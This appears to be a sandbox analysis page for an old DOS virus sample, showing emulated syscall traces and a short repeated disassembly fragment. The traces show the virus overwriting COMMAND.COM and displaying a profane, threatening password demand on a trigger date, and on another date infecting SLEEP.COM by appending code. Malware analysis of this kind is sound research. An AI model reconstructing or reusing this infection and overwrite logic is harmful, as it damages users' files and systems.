Sample viewer

vx.netlux.org/Virus.DOS.MutaGen.100.Secret.2094

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:19:04.841622262Z 42 PC: 12a50 | Get date
0x12a50: cmp dl, 0x11
0x12a53: jne 0x12aae
0x12a55: mov ax, 0x4301
0x12a58: mov cx, 0x20
0x12a5b: lea dx, word ptr [bp + 0x2a5]
0x12a5f: int 0x21
0x12a61: mov ax, 0x3d02
0x12a64: lea dx, word ptr [bp + 0x2a5]
0x12a68: int 0x21
0x12a6a: mov bx, ax
0x12a6c: mov ah, 0x40
0x12a6e: mov cx, 0x12
0x12a71: lea dx, word ptr [bp + 0x15c]
0x12a75: int 0x21
0x12a77: mov ah, 2
0x12a79: mov bh, 0
0x12a7b: mov dx, 0
0x12a7e: int 0x10
0x12a80: mov ah, 9
0x12a82: lea dx, word ptr [bp + 0x305]
2018-12-17T22:19:04.844502596Z 67 PC: 12a61 | Get or set file attributes
2018-12-17T22:19:05.185069141Z 61 PC: 12a6a | Open file (Filename = 'C:\COMMAND.COM')
2018-12-17T22:19:05.192030669Z 64 PC: 12a77 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:19:05.19642066Z 9 PC: 12a88 | Display string (String= 'I AM GOING TO FUCK YOUR HARD DISK IF YOU DON'T TYPE THE RIGHT PASSWORD. DON'T TURN OFF YOUR COMPUTER BECAUSE I ALREADY FUCKED YOUR HARD DISK AND I WILL FIX IT ONLY IF YOU ENTER THE RIGHT PASSWORD!!! PASSWORD IS:')
2018-12-17T22:19:05.201133185Z 12 PC: 12a8e | Flush input buffer and input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3283,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:45.797692861Z 42 PC: 12a50 | Get date
0x12a50: cmp dl, 0x11
0x12a53: jne 0x12aae
0x12a55: mov ax, 0x4301
0x12a58: mov cx, 0x20
0x12a5b: lea dx, word ptr [bp + 0x2a5]
0x12a5f: int 0x21
0x12a61: mov ax, 0x3d02
0x12a64: lea dx, word ptr [bp + 0x2a5]
0x12a68: int 0x21
0x12a6a: mov bx, ax
0x12a6c: mov ah, 0x40
0x12a6e: mov cx, 0x12
0x12a71: lea dx, word ptr [bp + 0x15c]
0x12a75: int 0x21
0x12a77: mov ah, 2
0x12a79: mov bh, 0
0x12a7b: mov dx, 0
0x12a7e: int 0x10
0x12a80: mov ah, 9
0x12a82: lea dx, word ptr [bp + 0x305]
2018-12-25T11:48:45.800217365Z 71 PC: 12ab8 | Get current directory
2018-12-25T11:48:45.804535694Z 26 PC: 12ac0 | Set disk transfer address
2018-12-25T11:48:45.806379087Z 78 PC: 12b00 | Find first file
2018-12-25T11:48:45.828233701Z 67 PC: 12b1e | Get or set file attributes
2018-12-25T11:48:45.834442801Z 67 PC: 12b2a | Get or set file attributes
2018-12-25T11:48:45.852348612Z 61 PC: 12b33 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:45.861108943Z 63 PC: 12b40 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:48:45.868078884Z 66 PC: 12b48 | Move file pointer
2018-12-25T11:48:45.869537665Z 87 PC: 12b7b | Get or set file date and time
2018-12-25T11:48:45.873850762Z 64 PC: 12ba2 | Write file or device (Write 986 bytes on handle 5)
2018-12-25T11:48:45.884090787Z 66 PC: 12baa | Move file pointer
2018-12-25T11:48:45.886315818Z 64 PC: 12bb5 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:45.89385632Z 87 PC: 12bc2 | Get or set file date and time
2018-12-25T11:48:45.895587714Z 62 PC: 12bca | Close file
2018-12-25T11:48:45.904508633Z 67 PC: 12bd7 | Get or set file attributes
2018-12-25T11:48:45.915189258Z 79 PC: 12b00 | Find next file (See above)
2018-12-25T11:48:45.918537406Z 67 PC: 12b1e | Get or set file attributes (See above)
2018-12-25T11:48:45.924592447Z 67 PC: 12b2a | Get or set file attributes (See above)
2018-12-25T11:48:45.934962173Z 61 PC: 12b33 | Open file (See above)
2018-12-25T11:48:45.949108275Z 63 PC: 12b40 | Read file or device (See above)
2018-12-25T11:48:45.955906377Z 66 PC: 12b48 | Move file pointer (See above)
2018-12-25T11:48:45.957275359Z 87 PC: 12b7b | Get or set file date and time (See above)

{"DateBased":true,"Day":17,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3283,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:46.132248408Z 42 PC: 12a50 | Get date
0x12a50: cmp dl, 0x11
0x12a53: jne 0x12aae
0x12a55: mov ax, 0x4301
0x12a58: mov cx, 0x20
0x12a5b: lea dx, word ptr [bp + 0x2a5]
0x12a5f: int 0x21
0x12a61: mov ax, 0x3d02
0x12a64: lea dx, word ptr [bp + 0x2a5]
0x12a68: int 0x21
0x12a6a: mov bx, ax
0x12a6c: mov ah, 0x40
0x12a6e: mov cx, 0x12
0x12a71: lea dx, word ptr [bp + 0x15c]
0x12a75: int 0x21
0x12a77: mov ah, 2
0x12a79: mov bh, 0
0x12a7b: mov dx, 0
0x12a7e: int 0x10
0x12a80: mov ah, 9
0x12a82: lea dx, word ptr [bp + 0x305]
2018-12-25T11:48:46.135133934Z 67 PC: 12a61 | Get or set file attributes
2018-12-25T11:48:46.476899065Z 61 PC: 12a6a | Open file (Filename = 'C:\COMMAND.COM')
2018-12-25T11:48:46.483866657Z 64 PC: 12a77 | Write file or device (Write 18 bytes on handle 5)
2018-12-25T11:48:46.488263981Z 9 PC: 12a88 | Display string (String= 'I AM GOING TO FUCK YOUR HARD DISK IF YOU DON'T TYPE THE RIGHT PASSWORD. DON'T TURN OFF YOUR COMPUTER BECAUSE I ALREADY FUCKED YOUR HARD DISK AND I WILL FIX IT ONLY IF YOU ENTER THE RIGHT PASSWORD!!! PASSWORD IS:')
2018-12-25T11:48:46.494239329Z 12 PC: 12a8e | Flush input buffer and input